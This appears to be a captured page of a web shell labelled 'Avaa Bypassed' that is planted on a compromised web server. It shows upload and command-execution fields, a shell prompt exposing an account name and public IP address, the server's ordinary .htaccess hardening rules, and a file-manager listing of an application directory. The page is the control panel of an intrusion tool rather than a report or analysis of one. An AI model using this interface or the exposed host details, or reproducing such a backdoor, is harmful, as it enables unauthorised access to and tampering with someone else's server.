[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.119.158.142: ~ $
# redirect to public page
<IfModule mod_rewrite.c>
  RewriteEngine On
  RewriteCond %{REQUEST_URI} !^public$
  RewriteCond %{REQUEST_URI} !^/.well-known/acme-challenge [NC]
  RewriteRule "^(.*)$" "[[relativeurl]]/public/" [R=301,L]
</IfModule>

# disable directory browsing
# For security reasons, Option all cannot be overridden.
Options +SymLinksIfOwnerMatch -Indexes

# prevent folder listing
IndexIgnore *

<IfModule mod_headers.c>
  Header always set X-Frame-Options "SAMEORIGIN"
</Ifmodule>

# Apache 2.4
<IfModule authz_core_module>
  # secure htaccess file
  <Files .htaccess>
    Require all denied
  </Files>

  # prevent access to PHP error log
  <Files error_log>
    Require all denied
  </Files>

  # prevent access to LICENSE
  <Files LICENSE>
    Require all denied
  </Files>

  # prevent access to csv, txt and md files
  <FilesMatch "\.(csv|txt|md|yml|json|lock)$">
    Require all denied
  </FilesMatch>
</IfModule>

# Apache 2.2
<IfModule !authz_core_module>
  # secure htaccess file
  <Files .htaccess>
    Order allow,deny
    Deny from all
    Satisfy all
  </Files>

  # prevent access to PHP error log
  <Files error_log>
    Order allow,deny
    Deny from all
    Satisfy all
  </Files>

  # prevent access to LICENSE
  <Files LICENSE>
    Order allow,deny
    Deny from all
    Satisfy all
  </Files>

  # prevent access to csv, txt and md files
  <FilesMatch "\.(csv|txt|md|yml|json|lock)$">
    Order allow,deny
    Deny from all
    Satisfy all
  </FilesMatch>
</IfModule>

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
.htaccess File 1.47 KB 0644
changelog.txt File 2.04 KB 0644
clone.php File 3.85 KB 0644
config.php File 19.5 KB 0644
database.php File 4.46 KB 0644
edit.php File 4.7 KB 0644
edit.xml File 433 B 0644
extend.php File 9.29 KB 0644
fileindex.php File 295 B 0644
import.php File 3.63 KB 0644
info.xml File 3.65 KB 0644
install.js File 921 B 0644
install.php File 4.32 KB 0644
install.xml File 792 B 0644
md5 File 7.48 KB 0644
notes.txt File 1.18 KB 0644
update_pass.php File 541 B 0644
upgrade.php File 5.47 KB 0644
upgrade.xml File 248 B 0644